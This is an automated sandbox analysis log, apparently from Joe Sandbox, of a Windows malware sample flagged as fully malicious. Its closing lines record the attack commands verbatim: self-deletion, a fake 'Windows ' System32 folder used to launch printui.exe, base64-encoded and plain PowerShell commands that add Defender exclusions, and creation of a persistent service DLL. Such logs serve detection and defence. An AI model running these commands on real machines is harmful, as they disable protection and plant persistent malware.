    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8A7D4B0CC55_2_00007FF8A7D4B0CC
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8A7CF585055_2_00007FF8A7CF5850
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8A7D5603C55_2_00007FF8A7D5603C
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8A7D1182055_2_00007FF8A7D11820
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8A7D4203055_2_00007FF8A7D42030
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8A7CF903055_2_00007FF8A7CF9030
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8A7D09FD055_2_00007FF8A7D09FD0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8A7D5B7A055_2_00007FF8A7D5B7A0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8A7D08F9055_2_00007FF8A7D08F90
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8A7D43F9055_2_00007FF8A7D43F90
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8A7D5972055_2_00007FF8A7D59720
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8A7CC36D055_2_00007FF8A7CC36D0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8A7CD26C955_2_00007FF8A7CD26C9
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8A7CD16F055_2_00007FF8A7CD16F0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8A7D3066055_2_00007FF8A7D30660
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8A7CE662F55_2_00007FF8A7CE662F
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8A7D09D6055_2_00007FF8A7D09D60
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8A7CEDD7055_2_00007FF8A7CEDD70
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8A7D2F4C055_2_00007FF8A7D2F4C0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8A7D4B4D455_2_00007FF8A7D4B4D4
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8A7D684B455_2_00007FF8A7D684B4
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8A7CDE4A055_2_00007FF8A7CDE4A0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8A7CF0C5055_2_00007FF8A7CF0C50
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8A7CD346055_2_00007FF8A7CD3460
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8A7D3A45055_2_00007FF8A7D3A450
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8A7CD5C0055_2_00007FF8A7CD5C00
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8A7CDB40055_2_00007FF8A7CDB400
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8A7D543FC55_2_00007FF8A7D543FC
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8A7D5B3F055_2_00007FF8A7D5B3F0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8A7D59BB855_2_00007FF8A7D59BB8
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8A7D08BD055_2_00007FF8A7D08BD0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8A7D4C37855_2_00007FF8A7D4C378
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8A7CCDB4055_2_00007FF8A7CCDB40
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8A7D5836855_2_00007FF8A7D58368
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8A7D0A30055_2_00007FF8A7D0A300
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8A7CC9AE055_2_00007FF8A7CC9AE0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8A7D092D055_2_00007FF8A7D092D0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8A7D4B2D055_2_00007FF8A7D4B2D0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8A7CCA29055_2_00007FF8A7CCA290
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8A7CE72A055_2_00007FF8A7CE72A0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8A7D5A23055_2_00007FF8A7D5A230
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8A7CCAA3055_2_00007FF8A7CCAA30
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8A7CD3A3055_2_00007FF8A7CD3A30
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8A7D68A0C55_2_00007FF8A7D68A0C
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8A7CDA9C055_2_00007FF8A7CDA9C0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8A7D339C055_2_00007FF8A7D339C0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8A7CE118055_2_00007FF8A7CE1180
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8A7D2F9B055_2_00007FF8A7D2F9B0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8A7CC315055_2_00007FF8A7CC3150
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8A7CF996055_2_00007FF8A7CF9960
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8A7D0993055_2_00007FF8A7D09930
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8340EB055_2_00007FF8B8340EB0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B834B95055_2_00007FF8B834B950
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B838DAD055_2_00007FF8B838DAD0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B833FBB055_2_00007FF8B833FBB0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83B9C4055_2_00007FF8B83B9C40
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8333C4055_2_00007FF8B8333C40
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8395C2055_2_00007FF8B8395C20
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83A9CC155_2_00007FF8B83A9CC1
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83B1D3055_2_00007FF8B83B1D30
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83A5E8055_2_00007FF8B83A5E80
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B835DEA055_2_00007FF8B835DEA0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8397FE055_2_00007FF8B8397FE0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B836202055_2_00007FF8B8362020
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B833C03055_2_00007FF8B833C030
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B838E0F055_2_00007FF8B838E0F0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B838D26055_2_00007FF8B838D260
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83532C055_2_00007FF8B83532C0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83B92A055_2_00007FF8B83B92A0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B839131055_2_00007FF8B8391310
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B833538055_2_00007FF8B8335380
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B833740055_2_00007FF8B8337400
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B837F42055_2_00007FF8B837F420
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83934C055_2_00007FF8B83934C0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83956E055_2_00007FF8B83956E0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83A985F55_2_00007FF8B83A985F
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B834B83055_2_00007FF8B834B830
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83A38C055_2_00007FF8B83A38C0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83B69E055_2_00007FF8B83B69E0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B835CA9055_2_00007FF8B835CA90
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8388B6055_2_00007FF8B8388B60
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B839CB3055_2_00007FF8B839CB30
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83A4CC055_2_00007FF8B83A4CC0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8394CD055_2_00007FF8B8394CD0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B837EDC055_2_00007FF8B837EDC0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8392FA055_2_00007FF8B8392FA0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B838F0F055_2_00007FF8B838F0F0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83A70A055_2_00007FF8B83A70A0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B836C24055_2_00007FF8B836C240
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B833221055_2_00007FF8B8332210
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B837C21055_2_00007FF8B837C210
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B839A2E055_2_00007FF8B839A2E0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83522E055_2_00007FF8B83522E0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83BC28055_2_00007FF8B83BC280
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B837835055_2_00007FF8B8378350
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B839E4E055_2_00007FF8B839E4E0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83A055055_2_00007FF8B83A0550
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B839059055_2_00007FF8B8390590
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B834C61055_2_00007FF8B834C610
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B839A6B055_2_00007FF8B839A6B0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B837C70055_2_00007FF8B837C700
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B90C8D7055_2_00007FF8B90C8D70
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B90B6AE055_2_00007FF8B90B6AE0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B90C344055_2_00007FF8B90C3440
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B90CE82055_2_00007FF8B90CE820
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B90D08B055_2_00007FF8B90D08B0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B90CE8E055_2_00007FF8B90CE8E0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B90CDF0055_2_00007FF8B90CDF00
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B91349E055_2_00007FF8B91349E0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B9166B5055_2_00007FF8B9166B50
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B91704A655_2_00007FF8B91704A6
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B913BA4055_2_00007FF8B913BA40
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B914AA5255_2_00007FF8B914AA52
    Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\libcurl.dll 36D97F1C254832CEE9698CEA2F1A63EA98D231641FD29715EF581BE103ACE602
    Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\zlib1.dll 7E9F43688189578042D791E3E5301165316EDC7C1ED739E0669C033A3CA08037
    Source: C:\Users\user\Desktop\dYUteuvmHn.exeCode function: String function: 00007FF712763740 appears 81 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF8B90D1AB0 appears 77 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF8A7CC3E40 appears 41 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF8B9124B60 appears 65 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF8B83BE0FE appears 63 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF8B90C2CD0 appears 48 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF8B9124A70 appears 95 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF8B83BE896 appears 148 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF8B8378FD0 appears 105 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF8B83BE278 appears 32 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF8B83BE27E appears 39 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF8B90C2D70 appears 260 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF8B90C2C50 appears 63 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF8B83BE104 appears 461 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF8B83BEDF0 appears 844 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF8B83BE10A appears 59 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF8B83BE926 appears 36 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF8B90D76EA appears 38 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF8B83683C0 appears 71 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF8B83BE1CA appears 1339 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF8B83BE8A2 appears 128 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF8B8368330 appears 65 times
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: String function: 00007FF8A934E230 appears 37 times
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: String function: 00007FF8A9353D10 appears 31 times
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: String function: 00007FF8A9314B60 appears 330 times
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: String function: 00007FF8A9314A70 appears 478 times
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: String function: 00007FF6CABB3670 appears 94 times
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: String function: 00007FF8A934E2A0 appears 83 times
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: String function: 00007FF8A9334EB0 appears 39 times
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: String function: 00007FF8A9314BB0 appears 52 times
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: String function: 00007FF8A9314D20 appears 44 times
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: String function: 00007FF8A93446D0 appears 45 times
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: String function: 00007FF8A9334D90 appears 42 times
    Source: libwinpthread-1.dll.39.drStatic PE information: Number of sections : 12 > 10
    Source: bav64.exe.39.drStatic PE information: Number of sections : 11 > 10
    Source: libintl-9.dll.39.drStatic PE information: Number of sections : 20 > 10
    Source: libiconv-2.dll.39.drStatic PE information: Number of sections : 20 > 10
    Source: dYUteuvmHn.exe, 00000000.00000000.2047560018.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamelibcurl.dllB vs dYUteuvmHn.exe
    Source: dYUteuvmHn.exe, 00000000.00000000.2047560018.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamezlib1.dll* vs dYUteuvmHn.exe
    Source: dYUteuvmHn.exe, 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamelibcurl.dllB vs dYUteuvmHn.exe
    Source: dYUteuvmHn.exe, 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamezlib1.dll* vs dYUteuvmHn.exe
    Source: dYUteuvmHn.exeBinary or memory string: OriginalFilenamelibcurl.dllB vs dYUteuvmHn.exe
    Source: dYUteuvmHn.exeBinary or memory string: OriginalFilenamezlib1.dll* vs dYUteuvmHn.exe
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKLM\SYSTEM\CurrentControlSet\services\x610437\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x610437.dat" /f
    Source: Process Memory Space: powershell.exe PID: 7112, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
    Source: classification engineClassification label: mal100.evad.winEXE@155/76@4/5
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B90D59C0 GetFileAttributesA,GetLastError,_errno,CreateFileA,GetLastError,DeviceIoControl,_errno,GetLastError,FormatMessageA,libintl_gettext,__acrt_iob_func,LocalFree,CloseHandle,_errno,CloseHandle,WideCharToMultiByte,_errno,isalpha,memcpy,55_2_00007FF8B90D59C0
    Source: C:\Users\user\Desktop\dYUteuvmHn.exeFile created: C:\Users\user\Desktop\curlapp64.exeJump to behavior
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2920:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2132:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4524:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5800:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3032:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5908:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4084:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3480:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5784:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6556:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3852:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6064:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5660:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3332:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5564:120:WilError_03
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6580:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3060:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4112:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1308:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5696:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4028:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3936:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6832:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5392:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6544:120:WilError_03
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ax2sheua.ecl.ps1Jump to behavior
    Source: dYUteuvmHn.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\System32\cmd.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\dYUteuvmHn.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: dYUteuvmHn.exeReversingLabs: Detection: 65%
    Source: svchost.exeString found in binary or memory: -start
    Source: svchost.exeString found in binary or memory: -addr
    Source: svchost.exeString found in binary or memory: ../../gettext-runtime/intl/loadmsgcat.c
    Source: unknownProcess created: C:\Users\user\Desktop\dYUteuvmHn.exe "C:\Users\user\Desktop\dYUteuvmHn.exe"
    Source: C:\Users\user\Desktop\dYUteuvmHn.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "C:\Users\user\Desktop\curlapp64.exe"
    Source: C:\Users\user\Desktop\dYUteuvmHn.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\user\Desktop\dYUteuvmHn.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\curlapp64.exe "C:\Users\user\Desktop\curlapp64.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
    Source: unknownProcess created: C:\Users\user\Desktop\curlapp64.exe "C:\Users\user\Desktop\curlapp64.exe"
    Source: unknownProcess created: C:\Users\user\Desktop\curlapp64.exe "C:\Users\user\Desktop\curlapp64.exe"
    Source: C:\Users\user\Desktop\curlapp64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c mkdir "\\?\C:\Windows \System32"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\curlapp64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\user\Desktop\curlapp64.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
    Source: C:\Users\user\Desktop\curlapp64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c rmdir /s /q "C:\Windows \"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\curlapp64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c mkdir "\\?\C:\Windows \System32"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\curlapp64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\user\Desktop\curlapp64.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
    Source: C:\Users\user\Desktop\curlapp64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c rmdir /s /q "C:\Windows \"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\curlapp64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c mkdir "\\?\C:\Windows \System32"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\curlapp64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "C:\Windows \System32\printui.exe"
    Source: C:\Users\user\Desktop\dYUteuvmHn.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\dYUteuvmHn.exeProcess created: C:\Windows \System32\printui.exe "C:\Windows \System32\printui.exe"
    Source: C:\Users\user\Desktop\dYUteuvmHn.exeProcess created: C:\Windows \System32\printui.exe "C:\Windows \System32\printui.exe"
    Source: C:\Users\user\Desktop\dYUteuvmHn.exeProcess created: C:\Windows \System32\printui.exe "C:\Windows \System32\printui.exe"
    Source: C:\Users\user\Desktop\curlapp64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\user\Desktop\curlapp64.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
    Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "$dec = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $dec;"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$dec = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $dec;"
    Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
    Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c sc create x610437 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x610437\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x610437.dat" /f && sc start x610437
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create x610437 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKLM\SYSTEM\CurrentControlSet\services\x610437\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x610437.dat" /f
